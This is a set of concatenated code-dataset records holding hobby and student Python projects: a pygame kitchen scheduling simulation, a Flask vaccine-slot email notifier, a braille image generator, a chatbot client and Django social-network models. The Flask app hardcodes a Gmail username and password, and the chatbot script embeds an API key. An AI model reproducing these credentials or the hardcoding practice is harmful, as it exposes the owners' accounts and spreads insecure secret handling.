y):\n\t\t\t\t\t\t\t\tself.cola3.put(proceso)\n\t\t\t\t\t\t\t\tself.procesador3.estado=estado\n\t\t\t\t\t\t\t\tself.pizarra3.arregloRecetas.append(proceso)\n\t\t\t\t\t\t\t\tprint(\"pico el click der\")\n\n\tdef pintar(self):\n\t\twhile self.procesador1.uso or self.procesador2.uso or self.procesador3.uso:\n\t\t\tself.reloj.tick(3)\n\n\t\t\tfor elemento in self.listaChefs:\n\t\t\t\telemento.update()\n\n\t\t\ttime.sleep(0.5)\n\t\t\tscreen.blit(self.fondo, self.fondorect)\n\n\t\t\tfor elemento in self.listaChefs:\n\t\t\t\tscreen.blit(elemento.image, elemento.rect)\n\n\t\t\tfor elemento in self.listaPizarras:\n\t\t\t\tscreen.blit(elemento.image, elemento.rect)\n\t\t\t\tfor i in elemento.arregloRecetas:\n\t\t\t\t\tif elemento.arregloRecetas[elemento.arregloRecetas.index(i)].estado==0:\n\t\t\t\t\t\tscreen.blit(i.iml, (elemento.rect[0]+30,elemento.rect[1]+elemento.arregloRecetas.index(i)*60+10))\n\t\t\t\t\telif elemento.arregloRecetas[elemento.arregloRecetas.index(i)].estado==1:\n\t\t\t\t\t\tscreen.blit(i.imb, (elemento.rect[0]+30,elemento.rect[1]+elemento.arregloRecetas.index(i)*60+10))\n\t\t\t\t\telif elemento.arregloRecetas[elemento.arregloRecetas.index(i)].estado==2:\n\t\t\t\t\t\tscreen.blit(i.ims, (elemento.rect[0]+30,elemento.rect[1]+elemento.arregloRecetas.index(i)*60+10))\n\t\t\t\t\telif elemento.arregloRecetas[elemento.arregloRecetas.index(i)].estado==3:\n\t\t\t\t\t\tscreen.blit(i.ime, (elemento.rect[0]+30,elemento.rect[1]+elemento.arregloRecetas.index(i)*60+10))\n\t\t\t\t\telif elemento.arregloRecetas[elemento.arregloRecetas.index(i)].estado==4:\n\t\t\t\t\t\telemento.arregloRecetas.remove(i)\n\n\t\t\tfor elemento in self.listaRecetas:\n\t\t\t\tscreen.blit(elemento.image, elemento.rect)\n\n\t\t\tfor elemento in self.listaComida:\n\t\t\t\tscreen.blit(elemento.iml, elemento.rect)\n\n\t\t\tscreen.blit(self.cuchillos.image, self.cuchillos.rect)\n\t\t\tscreen.blit(self.licuadora.image, self.licuadora.rect)\n\t\t\tscreen.blit(self.horno.image, self.horno.rect)\n\n\t\t\tpygame.display.update()\n\n\tdef crearProceso(self,nProcesos):\n\t\tfor i in range(nProcesos):\n\t\t\tself.asignar_pedido_aleatorio()\n\n\tdef asignar_pedido_aleatorio(self):\n\t\taleatorio1=np.random.randint(3)\n\t\taleatorio2=np.random.randint(3)\n\t\tif aleatorio1==0:\n\t\t\tproceso=PolloConPapas(self.numPo,self.recursos[0],size)\n\t\t\tself.numPo+=1\n\t\t\testado=\"trabajandoHorno1\"\n\n\t\telif aleatorio1==1:\n\t\t\tproceso=Ensalada(self.numEn,self.recursos[1],size)\n\t\t\tself.numEn+=1\n\t\t\testado=\"trabajandoCuchillo1\"\n\t\telse:\n\t\t\tproceso= Malteada(self.numMa,self.recursos[2],size)\n\t\t\tself.numMa+=1\n\t\t\testado=\"trabajandoLicuadora1\"\n\n\t\tif aleatorio2==0:\n\t\t\tself.cola1.put(proceso)\n\t\t\tself.procesador1.estado=estado\n\t\telif aleatorio2==1:\n\t\t\tself.cola2.put(proceso)\n\t\t\tself.procesador2.estado=estado\n\t\telse:\n\t\t\tself.cola3.put(proceso)\n\t\t\tself.procesador3.estado=estado\n\nclass Chef(Sprite, Procesador):\n\tdef __init__(self, cont_size,idProcesador,*args):\n\t\tSprite.__init__(self)\n\t\tProcesador.__init__(self,idProcesador,*args)\n\t\tself.cont_size = cont_size\n\t\tself.estados = [\"espera\", \"trabajandoCuchillo1\", \"trabajandoCuchillo2\",\n\t\t\t\t\t\t\"trabajandoHorno1\", \"trabajandoHorno2\",\n\t\t\t\t\t\t\"trabajandoLicuadora1\", \"trabajandoLicuadora2\"]\n\t\tself.estado = self.estados[0]\n\t\tself.imagenes = [util.cargar_imagen('imagenes/chef.png'),\n\t\t\t\t\t\t\t\t\t\tutil.cargar_imagen('imagenes/chefCuchi.png'),\n\t\t\t\t\t\t\t\t\t\tutil.cargar_imagen('imagenes/chefCuchi2.png'),\n\t\t\t\t\t\t\t\t\t\tutil.cargar_imagen('imagenes/chefHorno.png'),\n\t\t\t\t\t\t\t\t\t\tutil.cargar_imagen('imagenes/chefHorno2.png'),\n\t\t\t\t\t\t\t\t\t\tutil.cargar_imagen('imagenes/chefLicu.png'),\n\t\t\t\t\t\t\t\t\t\tutil.cargar_imagen('imagenes/chefLicu2.png')]\n\t\tself.image = self.imagenes[0]\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.move_ip(cont_size[0], cont_size[1]-250)\n\n\tdef update(self):\n\t\t#animacion sprite\n\t\tif self.proceso==None:\n\t\t\tself.image = self.imagenes[0]\n\t\t\tprint(\"el procesador\",self,\"no tiene proceso\")\n\t\telse:\n\t\t\tif self.proceso.recurso.nombre==\"Cuchillos\":\n\t\t\t\tif self.estado == self.estados[1]:\n\t\t\t\t\tself.image = self.imagenes[1]\n\t\t\t\t\tself.estado = self.estados[2]\n\t\t\t\telse:\n\t\t\t\t\tself.image = self.imagenes[2]\n\t\t\t\t\tself.estado = self.estados[1]\n\t\t\telif self.proceso.recurso.nombre==\"Horno\":\n\t\t\t\tif self.estado == self.estados[3]:\n\t\t\t\t\tself.image = self.imagenes[3]\n\t\t\t\t\tself.estado = self.estados[4]\n\t\t\t\telse:\n\t\t\t\t\tself.image = self.imagenes[4]\n\t\t\t\t\tself.estado = self.estados[3]\n\t\t\telse:\n\t\t\t\tif self.estado == self.estados[5]:\n\t\t\t\t\tself.image = self.imagenes[5]\n\t\t\t\t\tself.estado = self.estados[6]\n\t\t\t\telse:\n\t\t\t\t\tself.image = self.imagenes[6]\n\t\t\t\t\tself.estado = self.estados[5]\n\ncliente = cliente()\ncliente.iniciar()\n","sub_path":"Chef Race (SRTF) Final/srtf.py","file_name":"srtf.py","file_ext":"py","file_size_in_byte":13609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"91306060","text":"from datetime import date\nfrom typing import List\n\n\nclass Item:\n def __init__(self, descricao: str, valor: float):\n self._descricao: str = descricao\n self._valor: float = valor\n\n @property\n def descricao(self) -> str:\n return self._descricao\n\n @property\n def valor(self) -> float:\n return self._valor\n\n\nclass NotaFiscal:\n def __init__(self, razao_social: str,\n cnpj: str,\n itens: List[Item],\n data_da_emissao: date = date.today(), detalhes: str = '', observadores: List[any] = None):\n self._razao_social: str = razao_social\n self._cnpj: str = cnpj\n self._data_emissao: date = data_da_emissao\n if len(detalhes) > 20:\n raise Exception('Detalhes da nota não pode ter mais do que 20 caracteres')\n self._detalhes: str = detalhes\n self._itens: List[Item] = itens\n\n if observadores:\n for observador in observadores:\n observador(self)\n\n @property\n def razao_social(self) -> str:\n return self._razao_social\n\n @property\n def cnpj(self) -> str:\n return self._cnpj\n\n @property\n def data_emissao(self) -> date:\n return self._data_emissao\n\n @property\n def detalhes(self) -> str:\n return self._detalhes\n\n\nif __name__ == '__main__':\n from observadores import (\n imprime,\n envia_email,\n salva_no_banco\n )\n\n itens_teste: List[Item] = [\n Item(\n 'ITEM A',\n 100\n ),\n Item(\n 'ITEM B',\n 200\n )\n ]\n\n nota_fiscal: NotaFiscal = NotaFiscal(\n razao_social='FHSA Limitada',\n cnpj='012345678901234',\n itens=itens_teste,\n observadores=[imprime, envia_email, salva_no_banco]\n )\n","sub_path":"parte_um/nota_fiscal.py","file_name":"nota_fiscal.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"357068136","text":"from flask import Flask,render_template,request,session,redirect,url_for\r\nfrom flask_wtf import FlaskForm\r\nfrom wtforms import (StringField,SelectField,SubmitField,IntegerField)\r\nfrom wtforms import TextField\r\nfrom wtforms import validators\r\nfrom wtforms.validators import DataRequired,Email\r\nimport sqlite3 as sql\r\nimport os\r\nfrom datetime import datetime\r\nimport requests\r\nfrom flask_mail import Mail, Message\r\n\r\ncurrentdirectory = os.path.dirname(os.path.abspath(__file__))\r\n#__file__ -> app.py\r\n#os.path.abspath(__file__) -> grabing absolute path for app.py\r\n#o.apth.dirname ->grab directory name\r\n#o/p look like C:\\users\\deeksha\\pycharmProject\\cvt\\app.py\r\n\r\napp = Flask(__name__)\r\n\r\napp.config['SECRET_KEY'] = 'mysecretkey'\r\n\r\n#configuring flask-mail\r\napp.config['MAIL_SERVER'] = 'smtp.gmail.com'\r\napp.config['MAIL_PORT'] = 465\r\napp.config['MAIL_USERNAME'] = 'dpbp2022@gmail.com'\r\napp.config['MAIL_PASSWORD'] = 'Dpbpnie@2022'\r\napp.config['MAIL_USE_TLS'] = False\r\napp.config['MAIL_USE_SSL'] = True\r\nmail = Mail(app)\r\n\r\n\r\nclass InfoForm(FlaskForm):\r\n name = StringField('Name', [DataRequired()])\r\n email = TextField('Email',[validators.DataRequired(\"Please enter your email address\"),validators.Email(\"Please enter your valid email address\")])\r\n district = SelectField(u'District:',\r\n choices = [('270', 'Bagalkot'), ('276', 'Bangalore Rural'),('265','Banglaore Urban'),('294','BBMP'),\r\n ('264','Belgaum'),('274','Bellary'),('272','Bidar'),('271','Chamarajanagar'),('273','Chikamagalur'),\r\n ('291','Chikkaballapur'),('268','Chitradurga'),('269','Dakshina Kannada'),('275','Davanagere'),\r\n ('278','Dharwad'),('280','Gadag'),('267','Gulbarga'),('289','Hassan'),('279','Haveri'),\r\n ('283','Kodagu'),('277','Kolar'),('282','Koppal'),('290','Mandya'),('266','Mysore'),\r\n ('284','Raichur'),('292','Ramanagara'),('287','Shimoga'),('288','Tumkur'),('286','Udupi'),\r\n ('281','Uttar Kannada'),('293','Vijayapura'),('285','Yadgir')])\r\n submit = SubmitField('Submit')\r\n age = IntegerField('Age', [DataRequired()])\r\n\r\n@app.route('/',methods = ['GET','POST'])\r\ndef index():\r\n form = InfoForm()\r\n error=None\r\n if form.validate_on_submit():\r\n session['name'] = form.name.data\r\n session['email'] = form.email.data\r\n session['dist'] = form.district.data\r\n session['age'] = form.age.data\r\n d = { 270:'Bagalkot',276:'Bangalore_Rural',265:'Banglaore Urban',294:'BBMP',264:'Belgaum',\r\n 274:'Bellary',272: 'Bidar',271:'Chamarajanagar',273:'Chikamagalur',\r\n 291:'Chikkaballapur',268:'Chitradurga',269:'Dakshina Kannada',275:'Davanagere',\r\n 278:'Dharwad',280:'Gadag',267:'Gulbarga',289:'Hassan',279:'Haveri',\r\n 283:'Kodagu',277:'Kolar',282:'Koppal',290:'Mandya',266:'Mysore',\r\n 284:'Raichur',292:'Ramanagara',287:'Shimoga',288:'Tumkur',286:'Udupi',\r\n 281:'Uttar Kannada',293:'Vijayapura',285:'Yadgir'}\r\n name = session['name']\r\n email = session['email']\r\n di = session['dist']\r\n m = d[int(di)]\r\n age = session['age']\r\n #district = request.args.get('district')\r\n try:\r\n with sql.connect(currentdirectory + \"\\coviddatabase.db\") as con:\r\n cur=con.cursor()\r\n #cur.execute(\"CREATE TABLE stud(name TEXT,addr TEXT,city TEXT,pin TEXT)\")\r\n cur.execute(\"INSERT INTO Users(name,email,district,district_id,age) VALUES(?,?,?,?,?)\",(name,email,m,di,age))\r\n con.commit()\r\n receiver = email\r\n msg = Message('Vaccine Notifier', sender='dpbp2022@gmail.com', recipients=[receiver])\r\n msg.body = 'Thank you for registering to our website we will notify the vaccination slots' \\\r\n 'near you soon as and when it is available'\r\n mail.send(msg)\r\n return redirect(url_for(\"thankyou\"))\r\n except sql.Error as e:\r\n if con:\r\n con.rollback()\r\n print(f\"Error {e.args[0]}\")\r\n error=\"Email Id already exists,Please try with different email id\"\r\n return render_template(\"index.html\", form=form, error=error)\r\n\r\n return render_template(\"index.html\",form=form)\r\n\r\n\r\n@app.route('/thankyou')\r\ndef thankyou():\r\n name = request.args.get('name')\r\n district = request.args.get('district')\r\n return render_template('thank_you.html', name=name,district=district )\r\n\r\n@app.route('/list')\r\ndef list():\r\n con = sql.connect(\"coviddatabase.db\")\r\n con.row_factory = sql.Row\r\n cur = con.cursor()\r\n cur.execute(\"SELECT * FROM Users\")\r\n rows = cur.fetchall()\r\n for row in rows:\r\n print(row[0],row[1],row[2],row[3],row[4])\r\n name = row[0]\r\n email = row[1]\r\n district = row[2]\r\n district_id = row[3]\r\n age = row[4]\r\n start_date = datetime.today().strftime(\"%d-%m-%Y\")\r\n url = \"https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/calendarByDistrict\"\r\n params = {\"district_id\": district_id, \"date\": start_date}\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0\"}\r\n result = requests.get(url, params=params, headers=headers)\r\n s = \"Dear {} \".format(name)\r\n s = s + \"As requested by you, notifying you of some new vaccine slots centers around {} \".format(district)\r\n s = s + \"that have available slots on CoWIN.Here is the list\\n\\n\"\r\n flag=0\r\n if result.ok:\r\n response_json = result.json()\r\n if response_json[\"centers\"]:\r\n flag = 1\r\n for center in response_json[\"centers\"]:\r\n for session in center[\"sessions\"]:\r\n if age >= 45:\r\n if (session[\"min_age_limit\"] == 45 and session[\"available_capacity\"] > 0):\r\n s = s + 'Pincode: {}\\n'.format(center[\"pincode\"])\r\n s = s + \"Available on: {}\\n\".format(start_date)\r\n s = s + \"\\tHospital: {}\\n\".format(center[\"name\"])\r\n s = s + \"\\tAddress: {}\\n\".format(center[\"address\"])\r\n s = s + \"\\tBlock_name: {}\\n\".format(center[\"block_name\"])\r\n s = s + \"\\tPrice: {}\\n\".format(center[\"fee_type\"])\r\n s = s + \"\\tDose1 Capacity : {}\\n\".format(session[\"available_capacity_dose1\"])\r\n s = s + \"\\tDose2 Capacity : {}\\n\".format(session[\"available_capacity_dose2\"])\r\n if (session[\"vaccine\"] != ''):\r\n s = s + \"\\tVaccine type: {}\\n\\n\".format(session[\"vaccine\"])\r\n\r\n elif age >= 18:\r\n if (session[\"min_age_limit\"] == 18 and session[\"available_capacity\"] > 0):\r\n s = s + 'Pincode: {}\\n'.format(center[\"pincode\"])\r\n s = s + \"Available on: {}\\n\".format(start_date)\r\n s = s + \"\\tHospital: {}\\n\".format(center[\"name\"])\r\n s = s + \"\\tAddress: {}\\n\".format(center[\"address\"])\r\n s = s + \"\\tBlock_name: {}\\n\".format(center[\"block_name\"])\r\n s = s + \"\\tPrice: {}\\n\".format(center[\"fee_type\"])\r\n s = s + \"\\tDose1 Capacity : {}\\n\".format(session[\"available_capacity_dose1\"])\r\n s = s + \"\\tDose2 Capacity : {}\\n\".format(session[\"available_capacity_dose2\"])\r\n if (session[\"vaccine\"] != ''):\r\n s = s + \"\\tVaccine type: {}\\n\\n\".format(session[\"vaccine\"])\r\n s = s + \"\\n\\nBook your slots at the official CoWIN portal:https://selfregistration.cowin.gov.in/\"\r\n # print(s)\r\n if flag == 1:\r\n receiver = email\r\n msg = Message('Vaccine Notifier', sender='dpbp2022@gmail.com', recipients=[receiver])\r\n msg.body = s\r\n mail.send(msg)\r\n return render_template(\"notify.html\")\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"576129191","text":"#生成数据图像\nimport os\nimport math\nimport random\nimport numpy as np\nfrom PIL import Image\nimport cv2 as cv\nfrom tqdm import trange\t# 替换range()可实现动态进度条,可忽略\nfrom matplotlib import pyplot as plt\nfrom NeuralNetwork import tools\nimport pylab\n\nPATH = \"F:/BrailleFilePath/Dataset\";\n\n#生成空图像\ndef bulidModel(height, width):\n img = np.zeros((height, width), np.uint8); #生成二值图像\n return img;\n\n#把表示盲文的字符串变换为3*2的矩阵\ndef getBrailleArray(char_string):\n arr = np.zeros((3, 2), np.uint8);\n for i in range(3): #\n arr[i][0] = int(char_string[i]);\n for i in range(3): #\n arr[i][1] = int(char_string[i+3]);\n return arr;\n\n#绘制盲文\ndef drawBraille(char_string, height, width, size, height_b, width_b):\n # 对字符串反转,这样更便于我们对盲文系统的理解和使用\n # l = list(char_string);\n # l.reverse();\n # char_string = \"\".join(l);\n\n arr = getBrailleArray(char_string); #生成矩阵\n #print(arr);\n img = bulidModel(height, width); #生成背景\n h = round(height/3);\n w = round(width/2);\n # print(\"size:\",height,width);\n #把图像分为3*2=6个方格,在其中心绘制盲符\n for i in range(3):\n for j in range(2):\n if arr[i][j]==1 :\n # 中心坐标\n y = round(h / 2 + i * height / 3 + height_b + (1 - i) * size / 3);\n x = round(w / 2 + j * width / 2 + width_b + (0.5 - j) * 2 * size / 3); # 最后的数表示点距离的紧密度,数值越大越紧密\n # print(x, y);\n cv.circle(img, (x, y), size, 255, -1, 8);\n return img;\n\n#添加噪声\ndef setNoisy(img, num, sert):\n (h,w) = img.shape;\n for i in range(num):\n x = random.randint(1, h-1);\n y = w-random.randint(1, w-1);\n img[x][y] = sert;\n\n return img;\n\ndef rotate(img, rotate): #图像旋转\n img = Image.fromarray(img.astype('uint8'));\n img = img.rotate(rotate);\n img = np.asarray(img);\n return img\n\n#随机的仿射变换形变\ndef deform(img):\n (h,w) = img.shape;\n for i in range(1):\n src = np.float32([[0, 0], [100, 0], [0, 100]]);\n dst = np.float32([[0+random.randint(-5,5), 0+random.randint(-5,5)], [100+random.randint(-5,5), 0+random.randint(-5,5)], [0+random.randint(-5,5), 100+random.randint(-5,5)]]);\n A1 = cv.getAffineTransform(src, dst)\n # 第三个参数:变换后的图像大小\n # 第四个参数:形变后的边界值,默认0\n img = cv.warpAffine(img, A1, (w, h), borderValue = 0)\n # 显示操作之后的图片\n return img;\n\n#构建盲文二值图像\ndef build(char_bin, height, width, size):\n img = drawBraille(char_bin, height, width, size,\n random.randint(-round(height/25), round(height/25)),\n random.randint(-round(width / 15), round(width / 15))\n );\n img = rotate(img, random.randint(-2, 2)); # 随机旋转\n img = deform(img);\n # img = setNoisy(img,1000, 255);\n # img = setNoisy(img, 1000, 0);\n return img;\n\ndef main():\n height = 350;\n width = 250;\n size = 35;\n dataset_num = 1000;\n #64种点字\n print('Building images of braille characters');\n for c in trange(64):\n #创建目录\n trainPath = PATH + \"/training-images/\"+str(c);\n testPath = PATH+\"/test-images/\"+str(c);\n\n char_bin = tools.binString(c);\n if ~os.path.exists(trainPath):\n os.makedirs(trainPath);\n if ~os.path.exists(testPath):\n os.makedirs(testPath);\n\n #把标签保存到文件 a为追加写入 r为只读 w为覆盖写入\n f = open(PATH+\"/batches.meta.txt\", \"a\");\n f.write(char_bin+\"\\n\");\n\n #每种点字生成n个图像,80%作为训练集,20%作为测试集\n s1 = round(dataset_num * 0.8);\n s2 = round(dataset_num * 0.2);\n for i in range(s1):\n img = build(char_bin, height, width, size+random.randint(-5,5));\n # tools.showImg(\"Image\", img);\n img = Image.fromarray(img.astype('float32')); #转为Image类型\n img = img.resize((28, 28), Image.ANTIALIAS); #重整尺寸,不改变长宽比例\n img = np.asarray(img); #转为矩阵类型(个人比较喜欢矩阵操作)\n\n filename = trainPath + \"/im\" + str(i) + \".png\";\n cv.imwrite(filename, img); # 保存图像\n for i in range(s2):\n img = build(char_bin, height, width, size+random.randint(-10,10));\n # tools.showImg(\"Image\", img);\n img = Image.fromarray(img.astype('float32')); #转为Image类型\n img = img.resize((28, 28), Image.ANTIALIAS); #重整尺寸,不改变长宽比例\n img = np.asarray(img); #转为矩阵类型(个人比较喜欢矩阵操作)\n\n filename = testPath + \"/im\" + str(s1+i) + \".png\";\n cv.imwrite(filename, img); # 保存图像\n\n print('\\nAll finished!');\n\n\nif __name__ == \"__main__\":\n #initdirs();\n\n main();\n\n\n # img = build(tools.binString(63), 350, 250, 40);\n # img = Image.fromarray(img.astype('float32')); # 转为Image类型\n # img = img.resize((28, 28), Image.ANTIALIAS); # 重整尺寸,不改变长宽比例\n # img = np.asarray(img); # 转为矩阵类型(个人比较喜欢矩阵操作)\n # tools.showImg(\"Image\", img);\n\n","sub_path":"Dataset/Dataset_images.py","file_name":"Dataset_images.py","file_ext":"py","file_size_in_byte":5447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"470119958","text":"import pygame, sys\npygame.init()\n\nscreen = pygame.display.set_mode((640,480))\npygame.display.set_caption(\"TEST\")\n\nbg = pygame.Surface(screen.get_size()).convert()\nbg.fill((0,255,0))\nblock = pygame.Surface((100,100)).convert() \nblock.fill((255,0,0))\nblockx=0 \n \nclock = pygame.time.Clock()\n\nwhile 1:\n clock.tick(30)\n \n blockx+=20\n if blockx>640:\n blockx=-100\n \n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n break\n \n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n pygame.quit()\n sys.exit()\n break\n \n screen.blit(bg, (0,0))\n screen.blit(block, (blockx,190))\n pygame.display.flip()\n","sub_path":"Experimental/randompygametest.pyw","file_name":"randompygametest.pyw","file_ext":"pyw","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"405809348","text":"#8.8\n\ndef make_ablum(art_name='alif',art_album='bastobota'):\n art_info ={}\n take_info = 3\n while take_info>0:\n art_name = input('enter name:')\n if art_name in ('q','Q','QUIT','quit'):\n break\n art_album =input('enter album name: ')\n if art_album in ('q','Q','QUIT','quit'):\n break\n while art_album in art_info.values():\n print(\"you can't enter others album.\\nplease enter your album name.\")\n art_name = input('enter name:')\n art_album = input('enter album name: ')\n while art_album not in art_info.values():\n break\n continue\n else:\n art_info[art_name] =art_album\n take_info-=1\n for art_name in art_info.keys():\n print(f\"\\nhi {art_name},\\n\\tyour album is {art_info[art_name]}\")\n\nmake_ablum()","sub_path":"chapter_08/example_81.py","file_name":"example_81.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"586172621","text":"import requests\nimport json\napiKey = '41ec20e16de74df9b36e7b51af3ff712'\nuserId = 'raspberry'\nurl = 'http://openapi.tuling123.com/openapi/api/v2'\n\ndef tuling_chat(text):\n\n perception = {\n 'inputText':{\n 'text':text\n }\n }\n\n userInfo = {\n 'apiKey':apiKey,\n 'userId':userId\n }\n\n data = {\n 'reqType':0,\n 'perception':perception,\n 'userInfo':userInfo\n }\n\n headers = {\n 'Content-Type':'application/json'\n }\n\n data_json = json.dumps(data).encode('utf-8')\n result = requests.post(url, data=data_json, headers=headers)\n response_dict = json.loads(result.text)\n response_text = response_dict['results'][0]['values']['text']\n print(response_text)\n\nif __name__ == \"__main__\":\n text = input(\"请输入:\")\n tuling_chat(text)\n","sub_path":"各个模块的demo/图灵机器人/tuling.py","file_name":"tuling.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"72903186","text":"# aaa\n# python3\n\n# Python Programming: An Introduction to Computer Science\n# Chapter 7\n# Programming Excercise 9\n\n\ndef easterDate(year):\n if year < 1982 or year > 2048:\n return \"Year entered is out of date range.\"\n else:\n a = year % 19\n b = year % 4\n c = year % 7\n d = (19 * a + 24) % 30\n e = (2 * b + 4 * c + 6 * d + 5) % 7\n if 22 + d + e <= 31:\n date = \"Easter falls on March \" + str((22 + d + e))\n else:\n date = \"Easter falls on April \" + str((22 + d + e - 31))\n return date\n\n\ndef main():\n y = int(input(\"Enter the year: \"))\n print(easterDate(y))\n\n\nmain()\n","sub_path":"PPCh7PE9.py","file_name":"PPCh7PE9.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"535344166","text":"import pygame\nclass Bala(pygame.sprite.Sprite):\n def __init__(self, archivo):\n pygame.sprite.Sprite.__init__(self)\n self.image=pygame.image.load(archivo).convert_alpha()\n self.rect=self.image.get_rect()\n self.rect.x=0\n self.rect.y=0\n self.var_x=10\n self.dir=0\n\n def update(self):\n if self.dir==1:\n self.var_x=-20\n self.rect.x+=self.var_x\n","sub_path":"Bala_enemigo.py","file_name":"Bala_enemigo.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"444702391","text":"################################################################################\r\n##Problem 8 Chef and Operators ##\r\n##Description Chef has just started Programming, he is in first year of ##\r\n## Engineering. Chef is reading about Relational Operators. ##\r\n## ##\r\n## Relational Operators are operators which check relatioship ##\r\n## between two values. Given two numerical values A and B you need ##\r\n## to help chef in finding the relationship between them that is, ##\r\n## ##\r\n## * First one is greater than second or, ##\r\n## * First one is less than second or, ##\r\n## * First and second one are equal. ##\r\n##Input First line contains an integer T, which denotes the number of ##\r\n## testcases. Each of the T lines contain two integers A and B. ##\r\n##Output For each line of input produce one line of output. This line ##\r\n## contains any one of the relational operators '≺' , '≻' , '='. ##\r\n##Note The problem can be found on CodeChef at: ##\r\n## https://www.codechef.com/problems/CHOPRT ##\r\n################################################################################\r\n\r\n########################\r\n##Version 1 ##\r\n##Author Nam Phung ##\r\n##Date Dec 21 2015 ##\r\n########################\r\n\r\n##Input total test cases\r\nt = int(raw_input());\r\n\r\n##Input & process numbers\r\nfor i in range (t):\r\n \r\n [a,b] = raw_input().split()\r\n a = int(a)\r\n b = int(b)\r\n\r\n if (a < b): print('<')\r\n elif (a == b): print('=')\r\n else: print('>')\r\n","sub_path":"Python/08 - Chef And Operators.py","file_name":"08 - Chef And Operators.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"351426555","text":"from django.db.models.signals import post_save, pre_save\nfrom django.contrib.auth.models import User\nfrom django.dispatch import receiver\nfrom django.db import models\n\n# Create your models here.\n\nclass Country(models.Model):\n name = models.CharField(max_length = 50, primary_key = True)\n\n def __str__(self):\n return self.name\n\nclass City(models.Model):\n country = models.ForeignKey(Country, on_delete = models.CASCADE)\n name = models.CharField(max_length = 50)\n\n def __str__(self):\n return self.name\n\nclass Profile(models.Model):\n user = models.OneToOneField(User, on_delete = models.CASCADE, primary_key = True)\n\n phonenumber = models.IntegerField(null = True, blank = True)\n birthdate = models.DateField()\n\n movies = models.ManyToManyField('Movie', blank = True)\n books = models.ManyToManyField('Book', blank = True)\n\n city = models.ForeignKey(City, on_delete = models.SET_NULL, null = True)\n \n image = models.ImageField(default = 'profile/default.png', upload_to = 'profile/')\n \n friend_requests = models.ManyToManyField('self', 'friend_requests', blank = True)\n friends = models.ManyToManyField('self', 'friends', blank = True)\n\n def accept_request(self, of):\n if of in self.friend_requests.all() and of not in self.friends.all() and self not in of.friends.all():\n self.friend_requests.remove(of)\n self.friends.add(of)\n of.friends.add(self)\n return True\n return False\n\n def cancel_request(self, fr):\n if self in fr.friend_requests.all() and fr not in self.friends.all() and self not in fr.friends.all():\n fr.friend_requests.remove(self)\n return True\n return False\n\n def notify(self, by):\n Notification.objects.create(from_profile = by, to_profile = self)\n\n def notified(self, by):\n nots = Notification.objects.filter(from_profile = by, to_profile = self)\n notified = nots.count() > 0\n nots.delete()\n return notified\n\n def remove_friend(self, friend):\n if friend in self.friends.all() and self in friend.friends.all():\n self.friends.remove(friend)\n friend.friends.remove(self)\n return True\n return False\n\n def remove_request(self, by):\n if by in self.friend_requests.all() and by not in self.friends.all() and self not in by.friends.all():\n self.friend_requests.remove(by)\n return True\n return False\n\n def send_request(self, to):\n if to not in self.friend_requests.all() and to not in self.friends.all() and self not in to.friends.all():\n to.friend_requests.add(self)\n return True\n return False\n\n def __str__(self):\n return self.user.username\n\nclass Notification(models.Model):\n from_profile = models.ForeignKey(Profile, on_delete = models.CASCADE, related_name = 'from_profile')\n to_profile = models.ForeignKey(Profile, on_delete = models.CASCADE, related_name = 'to_profile')\n\nclass Chat(models.Model):\n receiver = models.ForeignKey(User, on_delete = models.CASCADE, related_name = 'receiver')\n sender = models.ForeignKey(User, on_delete = models.CASCADE, related_name = 'sender')\n datetime = models.DateTimeField()\n content = models.TextField()\n\n def __str__(self):\n return '{} - {} - {}'.format(self.sender.username, self.receiver.username, self.datetime.timestamp())\n\nclass Publication(models.Model):\n author = models.ForeignKey(User, on_delete = models.CASCADE, related_name = 'author')\n picture = models.ImageField(blank = True, upload_to = 'posts')\n datetime = models.DateTimeField()\n text = models.TextField()\n\n def __str__(self):\n return self.user.username + ' - ' + self.text\n\n @property\n def comments(self):\n return Comment.objects.filter(publication_id = self.id)\n\n @property\n def likes(self):\n return PublicationLike.objects.filter(publication = self)\n\nclass Comment(models.Model):\n publication = models.ForeignKey(Publication, on_delete = models.CASCADE, related_name = 'comment_publication')\n user = models.ForeignKey(User, on_delete = models.CASCADE, related_name = 'comment_user')\n text = models.TextField()\n\n def __str__(self):\n return self.user.username + ' - ' + self.text\n\nclass PublicationLike(models.Model):\n publication = models.ForeignKey(Publication, on_delete = models.CASCADE, related_name = 'publication')\n user = models.ForeignKey(User, on_delete = models.CASCADE, related_name = 'user')\n\nclass Movie(models.Model):\n title = models.TextField(primary_key = True)\n\n def __str__(self):\n return self.title\n\nclass Book(models.Model):\n title = models.TextField(primary_key = True)\n\n def __str__(self):\n return self.title\n\n@receiver(post_save, sender = User)\ndef save_user_profile(sender, instance, **kwargs):\n if Profile.objects.filter(user = instance).count() > 0:\n 